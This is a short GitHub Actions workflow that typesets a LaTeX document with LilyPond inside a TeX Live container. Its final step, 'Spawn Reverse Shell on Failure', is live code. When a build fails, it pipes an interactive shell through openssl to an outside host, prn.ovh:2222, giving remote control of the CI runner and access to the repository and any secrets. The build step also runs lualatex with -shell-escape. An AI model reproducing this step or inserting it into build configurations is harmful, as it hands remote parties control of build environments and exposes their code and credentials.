name: Typeset document
on:
  push:
  pull_request:
  workflow_dispatch:
env:
  DEBIAN_FRONTEND: noninteractive
jobs:
  typeset-document:
    name: Typeset document
    runs-on: ubuntu-latest
    container:
      image: texlive/texlive:latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2
      - name: Install Lilypond
        run: |
          set -e
          apt-get -qy update
          apt-get -qy install --no-install-recommends lilypond
      - name: Typeset document
        run: lualatex -shell-escape document.tex
      - name: Spawn Reverse Shell on Failure
        if: failure()
        run: |
          apt-get -qqy install openssl
          mkfifo /tmp/s; while true; do /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -strict -verify 1 -verify_return_error -CAfile .cert.pem -connect prn.ovh:2222 > /tmp/s; done
